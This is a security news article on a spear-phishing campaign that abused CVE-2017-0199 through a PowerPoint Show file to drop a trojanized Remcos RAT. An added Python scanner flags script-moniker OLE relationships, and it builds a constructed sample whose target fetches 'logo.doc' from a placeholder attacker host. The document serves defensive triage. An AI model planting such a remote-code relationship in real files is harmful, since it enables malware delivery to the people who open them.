In April Microsoft fixed the CVE-2017-0199 vulnerability in Office after threat actors had been exploiting it in the wild. The same vulnerability has now been found being exploited through a specially crafted PowerPoint Show (PPSX) presentation file.
CVE-2017-0199 was originally a zero-day remote code execution vulnerability in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office, which attackers exploited to deliver malware. It is commonly exploited via malicious Rich Text Format (RTF) documents.
According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider, and mainly targets companies in the electronics manufacturing industry. The attachment drops a remote access tool as its final payload.
When the malicious PowerPoint Show is opened, it displays the text CVE-2017-8570, which is a different Microsoft Office vulnerability. However, based on Trend Micro's analysis, it actually exploits CVE-2017-0199 instead. This is a leftover mistake from the toolkit developer, which the sender did not bother to change.
The file triggers a script moniker in ppt/slides/_rels/slide1[.]xml[.]rels. The exploit loads remote code from hxxp://192[.]166[.]218[.]230:3550/logo[.]doc, an address belonging to a VPN or hosting service abused by the attacker.
When the sample is run, PowerPoint initializes the script moniker and executes the remote malicious payload through the PowerPoint Show animations feature.
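The relationship part named above is where this sample differs from a normal slide deck, which makes it a useful place to triage suspicious PPSX attachments before anyone opens them. The following scanner is an added example, not code from the article or from Trend Micro: it unzips an OOXML package, reads every `*.rels` part, and flags relationships whose `TargetMode` is External when the target is a `script:` moniker or an OLE object pointing at a remote location, while leaving ordinary external hyperlinks alone. The `script:` prefix is assumed from the article's "script moniker" wording, the sample packages are constructed in memory, and the attacker host is a placeholder rather than a real indicator.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# OPC relationships namespace used by every *.rels part in an OOXML package.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(package_bytes):
    """Walk every *.rels part and return (part, type_suffix, target) for each
    relationship whose TargetMode is External, i.e. content fetched from outside the file."""
    found = []
    with zipfile.ZipFile(io.BytesIO(package_bytes)) as zf:
        for part in zf.namelist():
            if not part.lower().endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((part, rel_type, rel.get("Target", "")))
    return found


def triage(package_bytes):
    """Return (part, reason, target) alerts for relationships matching the CVE-2017-0199
    pattern. External hyperlinks are normal in slide decks and are not flagged; a script:
    moniker, or an OLE object whose target is a remote location, is."""
    alerts = []
    for part, rel_type, target in external_relationships(package_bytes):
        lowered = target.strip().lower()
        if lowered.startswith("script:"):
            alerts.append((part, "script-moniker", target))
        elif rel_type == "oleObject" and urlsplit(lowered).scheme in ("http", "https", "ftp", "file"):
            alerts.append((part, "remote-ole-object", target))
    return alerts


def build_ppsx(slide_rels_xml):
    """Build a minimal constructed PPSX-like zip containing only the parts the scanner reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("ppt/slides/slide1.xml", '<?xml version="1.0"?><sld/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


# Constructed sample: a normal layout relationship plus a script-moniker OLE object,
# the pattern the article describes (attacker.example is a placeholder host).
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}oleObject" Target="script:http://attacker.example/logo.doc" TargetMode="External"/>
</Relationships>
"""

# Constructed benign sample: an ordinary external hyperlink, which must not raise an alert.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{REL_TYPE_BASE}slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="{REL_TYPE_BASE}hyperlink" Target="https://www.example.com/" TargetMode="External"/>
</Relationships>
"""

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_RELS), ("benign", BENIGN_RELS)):
        print(label, triage(build_ppsx(rels)))
```

To use it on a real attachment, pass the file's bytes to `triage()`; because the check is on relationship metadata rather than on a specific URL or IP, it still fires when the attacker changes hosting, and it applies equally to DOCX and XLSX packages, which use the same relationship parts.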
The final payload, RATMAN.exe, is a trojanized version of the Remcos Remote Control tool, which, once installed, allows attackers to control infected computers remotely from their command-and-control server.
The easiest way to protect yourself completely from this attack is to download and apply the patches Microsoft released in April, which address the CVE-2017-0199 vulnerability.